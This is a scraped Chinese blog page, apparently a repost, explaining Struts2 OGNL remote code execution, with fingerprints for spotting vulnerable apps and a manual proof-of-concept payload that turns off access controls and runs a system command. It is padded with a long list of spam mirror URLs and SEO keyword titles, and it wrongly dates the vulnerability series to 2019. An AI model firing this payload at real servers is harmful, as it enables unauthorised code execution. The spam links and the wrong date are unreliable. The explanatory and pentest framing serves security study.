当前位置: 首页 > news >正文 合肥高端网站建设公司哪家好网站备案 取消接入 news 2025/10/22 21:46:45 合肥高端网站建设公司哪家好,网站备案 取消接入,嵊州网站建设,建立门户网站的程序文章目录 一、Struts2框架介绍二、Struts2远程代码执行漏洞三、Struts2执行代码的原理四、Struts2框架特征五、漏洞手工POC六、漏洞工具复现 一、Struts2框架介绍 ------ Struts2是apache项目下的一个web 框架#xff0c;普遍应用于阿里巴巴、京东等互联网、政府、企业门户网… 文章目录 一、Struts2框架介绍二、Struts2远程代码执行漏洞三、Struts2执行代码的原理四、Struts2框架特征五、漏洞手工POC六、漏洞工具复现 一、Struts2框架介绍 ------ Struts2是apache项目下的一个web 框架普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 ------ Struts框架本身分为三个部分核心控制器FilterDispatcher、业务控制器Action和用户实现的企业业务逻辑组件。 二、Struts2远程代码执行漏洞 ------ Struts2漏洞是一个经典的漏洞系列是在2019年被报出来的根源在于Struts2引入了OGNL表达式使得框架具有灵活的动态性。随着整体框架的补丁完善现在想挖掘新的Struts2漏洞会比以前困难很多从实际了解的情况来看大部分用户早就修复了历史的高危漏洞。目前在做渗透测试时Struts2漏洞主要也是碰碰运气或者是打到内网之后用来攻击没打补丁的系统会比较有效。 三、Struts2执行代码的原理 ------ Struts2的动态性在于 OGNL表达式可以获取到运行变量的值并且有机会执行函数调用。如果可以把恶意的请求参数送到 OGNL的执行流程中就会导致任意代码执行漏洞。 ------ Struts2的rce本质都是一样的(除了S2-052以外)都是Struts2框架执行了恶意用户传进来的 OGNL表达式造成远程代码执行。可以造成“命令执行、服务器文件操作、打印回显、获取系统属性、危险代码执行”等只不过需要精心构造不同的 OGNL代码而已。 四、Struts2框架特征 查看被测应用系统的源码URL接口地址以 “.action” “.do”结尾或者地址中包含“!”符号 在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件若存在struts2-core2.*.**.jar 或 xwork-core-2.*.**.jar格式的jar文件则需检测是否存在Struts2远程代码执行漏洞。 五、漏洞手工POC poc (%23_memberAccess[‘allowPrivateAccess’]true,%23_memberAccess[‘allowProtectedAccess’]true,%23_memberAccess[‘excludedPackageNamePatterns’]%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘excludedClasses’]%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘allowPackageProtectedAccess’]true,%23_memberAccess[‘allowStaticMethodAccess’]true,org.apache.commons.io.IOUtilstoString(java.lang.RuntimegetRuntime().exec(‘id’).getInputStream())) 注意有些情况利用的时候要记得url编码 其他struts2版本的POC可以参考 https://vulhub.org/#/environments/struts2/ 六、漏洞工具复现 文章转载自: http://www.morning.wskn.cn.gov.cn.wskn.cn http://www.morning.zlsmx.cn.gov.cn.zlsmx.cn http://www.morning.flfxb.cn.gov.cn.flfxb.cn http://www.morning.kdjtt.cn.gov.cn.kdjtt.cn http://www.morning.fmkjx.cn.gov.cn.fmkjx.cn http://www.morning.qcztm.cn.gov.cn.qcztm.cn http://www.morning.jkftn.cn.gov.cn.jkftn.cn http://www.morning.wnhml.cn.gov.cn.wnhml.cn http://www.morning.qtkdn.cn.gov.cn.qtkdn.cn http://www.morning.yysqz.cn.gov.cn.yysqz.cn http://www.morning.ykrss.cn.gov.cn.ykrss.cn http://www.morning.dnqpq.cn.gov.cn.dnqpq.cn http://www.morning.xq3nk42mvv.cn.gov.cn.xq3nk42mvv.cn http://www.morning.tqfnf.cn.gov.cn.tqfnf.cn http://www.morning.bzpwh.cn.gov.cn.bzpwh.cn http://www.morning.brps.cn.gov.cn.brps.cn http://www.morning.zrhhb.cn.gov.cn.zrhhb.cn http://www.morning.gthgf.cn.gov.cn.gthgf.cn http://www.morning.reababy.com.gov.cn.reababy.com http://www.morning.kdnbf.cn.gov.cn.kdnbf.cn http://www.morning.pwgzh.cn.gov.cn.pwgzh.cn http://www.morning.cmdfh.cn.gov.cn.cmdfh.cn http://www.morning.yixingshengya.com.gov.cn.yixingshengya.com http://www.morning.hrkth.cn.gov.cn.hrkth.cn http://www.morning.byxs.cn.gov.cn.byxs.cn http://www.morning.lpcct.cn.gov.cn.lpcct.cn http://www.morning.pqcsx.cn.gov.cn.pqcsx.cn http://www.morning.nfqyk.cn.gov.cn.nfqyk.cn http://www.morning.pjjkz.cn.gov.cn.pjjkz.cn http://www.morning.pjwfs.cn.gov.cn.pjwfs.cn http://www.morning.hbtarq.com.gov.cn.hbtarq.com http://www.morning.mtrrf.cn.gov.cn.mtrrf.cn http://www.morning.plcyq.cn.gov.cn.plcyq.cn http://www.morning.rpth.cn.gov.cn.rpth.cn http://www.morning.uycvv.cn.gov.cn.uycvv.cn http://www.morning.mslhq.cn.gov.cn.mslhq.cn http://www.morning.pbygt.cn.gov.cn.pbygt.cn http://www.morning.rrjzp.cn.gov.cn.rrjzp.cn http://www.morning.ddtdy.cn.gov.cn.ddtdy.cn http://www.morning.kndyz.cn.gov.cn.kndyz.cn http://www.morning.kstgt.cn.gov.cn.kstgt.cn http://www.morning.mwmxs.cn.gov.cn.mwmxs.cn http://www.morning.trhlb.cn.gov.cn.trhlb.cn http://www.morning.lfcfn.cn.gov.cn.lfcfn.cn http://www.morning.mnyzz.cn.gov.cn.mnyzz.cn http://www.morning.pwgzh.cn.gov.cn.pwgzh.cn http://www.morning.gqfbl.cn.gov.cn.gqfbl.cn http://www.morning.zyrp.cn.gov.cn.zyrp.cn http://www.morning.rdnkx.cn.gov.cn.rdnkx.cn http://www.morning.wgtnz.cn.gov.cn.wgtnz.cn http://www.morning.tdgwg.cn.gov.cn.tdgwg.cn http://www.morning.mpxbl.cn.gov.cn.mpxbl.cn http://www.morning.kgrwh.cn.gov.cn.kgrwh.cn http://www.morning.kpbgp.cn.gov.cn.kpbgp.cn http://www.morning.rcmwl.cn.gov.cn.rcmwl.cn http://www.morning.ryfqj.cn.gov.cn.ryfqj.cn http://www.morning.wjlkz.cn.gov.cn.wjlkz.cn http://www.morning.qsy37.cn.gov.cn.qsy37.cn http://www.morning.sjwqr.cn.gov.cn.sjwqr.cn http://www.morning.lhyhx.cn.gov.cn.lhyhx.cn http://www.morning.dwfxl.cn.gov.cn.dwfxl.cn http://www.morning.btmwd.cn.gov.cn.btmwd.cn http://www.morning.fxzlg.cn.gov.cn.fxzlg.cn http://www.morning.nlywq.cn.gov.cn.nlywq.cn http://www.morning.kybyf.cn.gov.cn.kybyf.cn http://www.morning.zlzpz.cn.gov.cn.zlzpz.cn http://www.morning.qrnbs.cn.gov.cn.qrnbs.cn http://www.morning.tqsnd.cn.gov.cn.tqsnd.cn http://www.morning.fdfsh.cn.gov.cn.fdfsh.cn http://www.morning.wjyyg.cn.gov.cn.wjyyg.cn http://www.morning.rqrh.cn.gov.cn.rqrh.cn http://www.morning.dpbgw.cn.gov.cn.dpbgw.cn http://www.morning.ldynr.cn.gov.cn.ldynr.cn http://www.morning.mpxbl.cn.gov.cn.mpxbl.cn http://www.morning.rnkq.cn.gov.cn.rnkq.cn http://www.morning.ysybx.cn.gov.cn.ysybx.cn http://www.morning.gqcsd.cn.gov.cn.gqcsd.cn http://www.morning.wbllx.cn.gov.cn.wbllx.cn http://www.morning.lqgfm.cn.gov.cn.lqgfm.cn http://www.morning.pctsq.cn.gov.cn.pctsq.cn 查看全文 http://www.tj-hxxt.cn/news/240763.html 相关文章: 简单的购物网站制作昆明seo怎么做 友情链接站长平台制作宣传片视频 网站开发进阶实训报告直接在原备案号下增加新网站 做布料的著名网站广州地铁官网 网站开发googlevue cdn做的网站 制作个人网站教程怎么分析网页的布局 要建立网站和账号违法违规行为数据库和什么黑名单怎么在虚拟空间做两个网站 学校网站开发的背景网站建设代码题 网站怎么做登陆17网站一起做网店潮汕 烟台怎么做网站建设网站花多少钱 哪家房屋设计公司网站新北做网站 焦作网站建设哪家便宜外链工具在线 百度云做网站空间做AMC12的题的网站 如何制作收费网站响应式网页设计名词解释 天津做网站的费用东港网站建设 做国外的营销的网站如何更改网站关键词 网站软件下载wordpress movie 压铸东莞网站建设苏宁易购网站建设情况 站长工具天美传媒深圳个人网站制作 站外推广营销方案建筑人才网 珠海 内江市网站建设网站获取访问者qq号码 网站域名怎么申请阜南网站建设公司 网站建设项目规划书案例做网站为什么要买服务器 百度的合作网站有哪些怎么做网站搜索框搜索 建设部网站资质查询6wordpress 用户登录ip 怎么推广公司的网站记事本做网站的代码 网站优化哪个公司好晋中企业网站建设 做速卖通的素材有哪些网站建设125摩托车价格及图片 外贸网站如何做网络安全防护 怎么做属于自己的售卡网站品牌设计和广告设计
